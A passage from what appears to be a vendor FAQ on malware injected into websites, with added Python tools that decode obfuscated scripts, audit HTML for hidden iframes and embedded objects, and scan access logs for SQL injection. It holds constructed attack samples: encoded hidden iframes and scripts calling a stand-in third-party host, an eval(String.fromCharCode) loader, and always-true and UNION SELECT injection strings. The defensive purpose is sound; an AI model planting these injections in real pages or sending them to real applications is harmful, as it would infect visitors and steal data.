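    js = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)
    return unquote(js)  # %XX, as unescape() would do in the browser


def decode_all(js: str, max_layers: int = 5) -> str:
    """Strip stacked encodings until a pass changes nothing (bounded)."""
    for _ in range(max_layers):
        decoded = decode_layer(js)
        if decoded == js:
            break
        js = decoded
    return js


def triage_script(js: str) -> dict:
    """Return the indicators found, the hosts referenced and the decoded text."""
    decoded = decode_all(js)
    hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, decoded, re.I))
    hosts = sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", decoded)))
    return {"indicators": hits, "hosts": hosts, "decoded": decoded}


# Constructed samples: one legitimate menu script and two injected ones.
CLEAR_SCRIPT = 'document.getElementById("menu").style.display = "block";'
URLENCODED_SCRIPT = (
    'var a="%3Ciframe%20src%3D%22http%3A%2F%2Funknown-third-party-host.com%2Floader.php%22'
    '%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E";document.write(unescape(a));'
)
UNICODE_SCRIPT = (
    'var s="\\u003cscript src=\\u0022http://unknown-third-party-host.com/load.js\\u0022'
    '\\u003e\\u003c/script\\u003e";'
    # String.fromCharCode(...) below spells document.write(s)
    'eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,115,41));'
)

if __name__ == "__main__":
    for name, js in [("clear", CLEAR_SCRIPT), ("urlencoded", URLENCODED_SCRIPT), ("unicode", UNICODE_SCRIPT)]:
        r = triage_script(js)
        print(f"{name:>10}: indicators={r['indicators']} hosts={r['hosts']}")
        print(f"{'':>12}{r['decoded']}")
```

Run over a page's inline scripts, anything with a non-empty indicator list or an unexpected host is what the second rule above tells you to question; a clear-text script that references only your own hosts and uses none of these calls is the easy case.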

39. Are there other means of malware injection besides iframes?
Malware is an ever-evolving technology. Changes in attack goals and technology improvements have resulted in many iterations and variations from typical attack methods. In some cases the malware injection may not rely on iframes at all:

Malware placed directly on the compromised web server

Earlier examples discussed the situation where a web server is compromised with the intent of forcing the browser to download malware from a website other than the one hosting the compromised application. In this case, some form of redirection is required.

However, if the server hosting the compromised Web application also hosts the browser exploit and the active malware download, then there will be no need for the hacker to redirect the browser and therefore there is no need for an iframe.

Malicious code inside an embedded object

Recent trends [10] indicate that instead of injecting malicious code into the HTML itself, hackers are injecting objects such as PDF documents or Flash animations with the malicious code inside them. The objects are embedded using the <embed> or <object> tags and thus require no iframe. When the browser requests the web page with the malicious object, the browser extension for that object (PDF reader, Flash player, media player) processes the malicious code and is exploited.

Malicious code injected into the database

It is possible to inject malicious code right into the database by inserting commands or queries in user input form fields. It may be possible to exploit poor application input filtering and thus interact directly with the database. Once this is achieved, database credentials can be retrieved or database output can be modified so as to redirect all browsers querying the database to a website of the hacker's choosing. Again, if the redirection is dynamically specified in database output, there may not be any evidence in the web application's source files: the injected content appears only in the pages the application renders from the stored data.

[10] Adobe Reader Zero-Day Exploit, Dec 2009, http://www.pcworld.com/businesscenter/article/184704/adobe_reader_zeroday_exploit_protecting_your_pc.html



40. How can I tell if my website has injected objects such as Flash or PDFs?
Objects such as PDFs, images, iframes, etc. can be embedded in the HTML code using the <object> tag, for example:
<object onreadystatechange="Name"></object>
In addition, Flash animation will also rely on the <embed> or <object> tags.

Hackers can embed code in these components to compromise the browser extensions that handle them. If the objects themselves are malicious, examination of the HTML code will not reveal anything other than the presence of the object. Without attack signatures from the plugin vendors, it may be difficult to identify these components as malicious. In this case it is recommended to question all tags related to object embedding to ensure that they are legitimate.
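The tell-tale signs from question 37 (an iframe pulled from a 3rd-party host, zero dimensions, visibility hidden) and the advice above to question every object-embedding tag can be applied mechanically to a page's HTML. The following is an added example, not code from the original FAQ or from Armorize; SITE_HOST, the sample page and the function names are constructed. It reports third-party iframes and scripts, tiny or hidden iframes, and every <object>/<embed> so that each can be confirmed as legitimate by hand.

```python
"""Audit a page's HTML for injected iframes, scripts and embedded objects.

Added example, not code from the original FAQ. It applies the tell-tale signs
listed under questions 37 and 40: an iframe or script pulled from a third-
party host, an iframe that is zero-sized or hidden, and any <object>/<embed>
element, which is reported so its legitimacy can be confirmed by hand.
SITE_HOST and the sample page are constructed for illustration.
"""
from __future__ import annotations

from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example.com"  # assumed: host of the site being audited


def _tiny(value: str | None) -> bool:
    """True for a width/height of 0 or 1 (bare number or pixels)."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2].strip()
    try:
        return float(v) <= 1
    except ValueError:  # percentages, 'auto', garbage: not a hiding trick we can judge
        return False


def _hidden_style(style: str) -> bool:
    s = style.replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s


class InjectionAuditor(HTMLParser):
    """Collect elements that match the injection tell-tales while parsing."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[dict] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag not in ("iframe", "script", "object", "embed"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src") or a.get("data", "")  # <object> uses data=, the rest src=
        host = urlparse(src).hostname
        reasons = []
        if host and host != SITE_HOST:
            reasons.append(f"third-party {host}")
        if tag == "iframe":
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("tiny or zero-sized")
            if _hidden_style(a.get("style", "")) or "hidden" in a:
                reasons.append("hidden")
        if tag in ("object", "embed"):
            reasons.append("embedded object: confirm it is legitimate")
        if reasons:
            self.findings.append({"line": self.getpos()[0], "tag": tag, "src": src, "reasons": reasons})


def audit_html(html: str) -> list[dict]:
    """Return one finding per suspicious element, in document order."""
    parser = InjectionAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one legitimate script, iframe and PDF, plus two injected elements.
SAMPLE_PAGE = """<html><head>
<script src="/js/menu.js"></script>
<script src="http://unknown-third-party-host.com/load.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="/video-player.html" width="640" height="360"></iframe>
<iframe src="http://unknown-third-party-host.com/loader.php" width="1" height="1" style="visibility: hidden"></iframe>
<object data="/brochure.pdf" type="application/pdf"></object>
</body></html>"""

if __name__ == "__main__":
    for f in audit_html(SAMPLE_PAGE):
        print(f"line {f['line']:>3} <{f['tag']}> {f['src']!r}: {', '.join(f['reasons'])}")
```

The parser only sees tags present in the served HTML, so run it against the page as a browser would receive it (not the template on disk), and pair it with a review of inline scripts, since an iframe created by document.write never appears as a tag.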

41. How do I know my database has been injected?
Web applications rely heavily on databases. They are often referred to as being dynamic due to the fact that much of what is displayed in the browser is not a result of the web code itself but is instead dynamically generated from the database in response to user input.

If a hacker has managed to successfully inject commands directly into the database, they may be able to control it and thus govern what is returned to web browsers. This may include iframes or other malicious content that seeks to exploit the browser.

In some cases, there may be little evidence in the source code. A more effective strategy at this stage is to analyze the HTTP logs with a specific focus on the application form fields. In this way it may be possible to isolate SQL query syntax that passed through the form fields. Note that a standard web server access log records only the query string of each request; parameters sent in a POST body appear only if application-level request logging was enabled.

Queries with parameters that will always be true are general indicators of SQL injection attempts, as in the example shown below.
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

For more information on general SQL injection testing steps refer to OWASP's SQL injection testing guide [11].


[11] Testing for SQL Injection (OWASP-DV-005), http://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OWASP-DV-005%29
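The log review described under question 41 can be scripted: URL-decode every query-string parameter in each access-log line and look for the always-true condition shown above, along with the other SQL fragments an injection attempt carries. The following is an added example, not code from the original FAQ or from Armorize; the log lines are constructed in Apache combined format and the addresses, paths and parameter names are invented for illustration.

```python
"""Scan web server access logs for SQL syntax arriving through form fields.

Added example, not code from the original FAQ. The log lines are constructed
in Apache combined format (query strings only; POST bodies are not in a
standard access log). The scanner URL-decodes each parameter value and looks
for the always-true conditions the text describes, plus UNION, comment and
stacked-query fragments. Treat hits as leads to investigate, not proof.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote_plus, urlparse

# Apache combined log: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

SQLI_PATTERNS = [
    # OR '1'='1, OR 1=1, AND 'a' = 'a': the same token on both sides of '='
    ("always-true", re.compile(r"""(?i)\b(or|and)\s*['"]?\s*(\w+)\s*['"]?\s*=\s*['"]?\s*\2\b""")),
    ("union", re.compile(r"(?i)\bunion\s+(?:all\s+)?select\b")),
    ("comment", re.compile(r"(?:--|/\*)")),
    ("stacked", re.compile(r"(?i);\s*(?:drop|insert|update|delete|exec)\b")),
]


def suspicious_params(path: str) -> list[tuple[str, str, str]]:
    """Return (param, decoded value, pattern name) for every value that matches."""
    hits = []
    for name, value in parse_qsl(urlparse(path).query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode pass catches double-encoded payloads
        for label, pat in SQLI_PATTERNS:
            if pat.search(value):
                hits.append((name, value, label))
    return hits


def scan_log(lines) -> list[dict]:
    """Parse each access-log line and report suspicious query parameters."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # blank line or a format this parser does not understand
        for param, value, label in suspicious_params(m["path"]):
            findings.append({"ip": m["ip"], "time": m["time"], "status": m["status"],
                             "param": param, "value": value, "label": label})
    return findings


# Constructed sample: a normal login, the always-true login from the text,
# a UNION probe with a trailing comment, and an ordinary search.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2010:09:12:01 +0000] "GET /login.asp?username=alice&password=s3cret HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2010:09:12:44 +0000] "GET /login.asp?username=1%27+OR+%271%27+%3D+%271&password=1%27+OR+%271%27+%3D+%271 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Feb/2010:09:13:10 +0000] "GET /products.asp?id=7+UNION+SELECT+username%2Cpassword+FROM+users-- HTTP/1.1" 500 312 "-" "curl/7.19"
203.0.113.5 - - [10/Feb/2010:09:14:02 +0000] "GET /search.asp?q=blue+shoes HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['ip']} {f['label']:<11} {f['param']}={f['value']!r}")
```

A 200 response to an always-true login is worth more attention than a 500 to a UNION probe: the first suggests the query actually succeeded, the second that the application choked on it. Either way the next step is to reproduce the request against a test copy and read the application's own database query logging.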


42. What other services might a hacker exploit for injection?
There are numerous injection paths into the server besides the Web application and the database.

Web server

If the Web server itself is vulnerable, the hacker may be able to gain access to it in order to control it. For example, if the server configuration has not been changed from the defaults, the hacker may be able to access the administration website via known passwords. Alternatively, if the web server has not been patched against attacks such as path traversal, the hacker may be able to navigate from the website to the server file system.

Other services

If other services such as FTP, SMTP, etc. are running on the server, it may be possible to gain elevated privilege through an associated vulnerability or commonly known password. For example, it is very common for hackers to share FTP passwords for hosting servers. These passwords are typically supplied to website owners to facilitate content uploads, but they are rarely changed and eventually leak out.

Operating system

If the operating system itself is vulnerable, a hacker may be able to inject OS-level commands via the website or another running service. There are many Trojan applications that are specifically designed to trawl infected computers' hard drives looking for passwords that can be used to exploit servers in the same domain. For example, if a Trojan is placed on a workstation in the company.com domain, it will report back all passwords stored on that computer. Once the writer of the Trojan gets these, he will attempt to use them to break into public-facing servers. If the infected computer belonged to an administrator, it is highly likely that there will be some valuable passwords stored.

43. If my website is injected, is my web server or operating system also compromised?
Malware injection takes advantage of vulnerable web applications to inject code that exploits and controls web browsers accessing the application. In a typical scenario, both the browser exploit and the malware itself reside on servers other than the one hosting the website. This is illustrated in Figure 8.

Therefore, malicious code injected into a single website does not necessarily indicate a compromise of the web server itself. It is important to note, however, that if the website is vulnerable to injection it may be possible for a hacker to leverage this to inject database or operating system commands, which may result in total server compromise.



This leads to the other malware injection scenario, where the browser exploit and malware reside on the server hosting the website. In this case, the hacker does not use any iframes or JavaScript but instead ensures that browsers accessing the website are compromised directly.

This is a less common scenario, as websites hosting and serving up actual live malware are much easier to find than simple iframes.

44. If a web server hosts multiple websites, are they all affected by a single injection?
Malware injection takes advantage of vulnerable web applications to inject code that exploits and controls web browsers accessing the application. In a typical scenario, both the browser exploit and the malware itself reside on servers other than the one hosting the website. This is illustrated in Figure 8.

Therefore, malicious code injected into a single website does not necessarily indicate a compromise of all the websites hosted on the server. It is important to note, however, that if the attacker gained entry via the OS or other vulnerable services rather than through one application's input fields, it is highly likely that they can compromise the other websites on the server as well.

45. If my website is downloading malware to users, how do I mitigate?

It is critical to stop the drive-by download as soon as possible in order to protect clients and to ensure that the website is not flagged as malicious by search engines such as Google [12]. However, mitigation only addresses the immediate problem. It does not deal with the root cause.

Code identification

In order to remove the injected code, it will be necessary to examine the web page for syntax such as:
<script src=http://unknown-third-party-host.com/load.js > </script>
<script>[obfuscated javascript that contains eval(xyz);]</script>
<iframe src=http://unknown-third-party-host.com/loader.php > </iframe>

It is also necessary to review all JavaScript statements to determine:
- Whether they are legitimate or have been injected by a hacker

[12] Note that immediate mitigation steps may have the effect of destroying evidence which could be of use in subsequent investigation.



- Why they are scrambled, encoded or obfuscated
- What the syntax is once they are decoded
- Whether the actual decoded JavaScript calls up an iframe or redirects to a 3rd-party website

If the JavaScript code is not a legitimate part of the application then it must be removed.

It is also necessary to examine embedded objects (using the <embed> and <object> tags) such as Flash, PDF and images. It is possible for hackers to embed code in these components to compromise the browser extension that handles them. In general, it is recommended to review all objects to be sure they serve a legitimate function.

Remove injected code

Removing injected code from the compromised web page will provide instant mitigation but will not resolve the underlying issue. This is because the vulnerability that allowed injection in the first place (most likely resulting from failure to filter application input or output) will continue to exist. This means that the hacker is free to come back to carry out injection again. For more information on root cause remediation see question 46.

Restore from backup

If the injected code cannot be identified and there is a known-good backup of the web application source code, then the application can be reinstalled. Before doing so, keep a copy of the compromised files for investigation and change any credentials (FTP, database, administrative) that may have been exposed, since restoring the files does nothing about a password the hacker already holds. However, if the restored application has the same vulnerabilities, it is only a matter of time before the injection happens again.

Removal through egress filtering

It is also possible to enable automated removal of malicious elements from outbound HTTP responses. This will require integration between the malware detection process and perimeter egress controls working at the application layer.

If the actual exploit code being downloaded to web browsers can be identified, it may be possible to utilize the outbound HTTP (response) analysis capabilities of the web server or the Web Application Firewall (WAF) to filter out traffic with those patterns. For example, Armorize HackAlert supports a web server plugin that receives HackAlert notifications and automatically filters malicious elements out of HTTP responses in real time.

46. If my website is downloading malware to users, how do I remediate?



Shifting security focus to Web applications does not mean that tried and trusted security mechanisms should be cast aside. Practices such as OS and Web server patching as well as network access controls and firewalls continue to be critical security steps.

However, with the fundamental open channel (reference Figure 5) that exists between the public-facing website and the Internet, additional protection higher in the protocol stack is required. In order to secure the website it is necessary to:

Secure the Web application itself

Secure coding and development practices will ensure that Web application security is implemented from the outset. Typically a great deal can be achieved by ensuring appropriate input and output filtering. This will ensure that no unexpected or malicious parameters are passed to the Web application or back to the users. However, while fairly simple to implement during development, in a large code base the location of all potential entry points requiring such filtering is best achieved by an automated source code analysis or software verification tool such as Armorize CodeSecure.

Black-box testing

Also known as penetration testing or vulnerability assessment, this testing technique is used to emulate hacker activity on the running application. Implemented through specialized scanning software or as manual testing, the goal is to locate application entry points vulnerable to the sort of attacks that would allow injection.

Block attacks in inbound HTTP requests

Web Application Firewalls (WAF) such as Armorize SmartWAF will inspect inbound HTTP traffic to ensure that there are no attacks embedded in HTTP requests. Note that with the dynamic and evolving nature of attacks, simply blacklisting potential attack patterns may not be very effective.

Monitor and filter outbound HTTP responses

If a website is injected, the most obvious indicator is malware drive-by downloads present in the HTTP response traffic. Armorize HackAlert monitors outbound HTTP traffic to ensure that there are no malicious elements that would signify drive-by downloading. Additionally, HackAlert will work with its web server module to ensure that malicious elements are automatically removed from HTTP responses in real time.

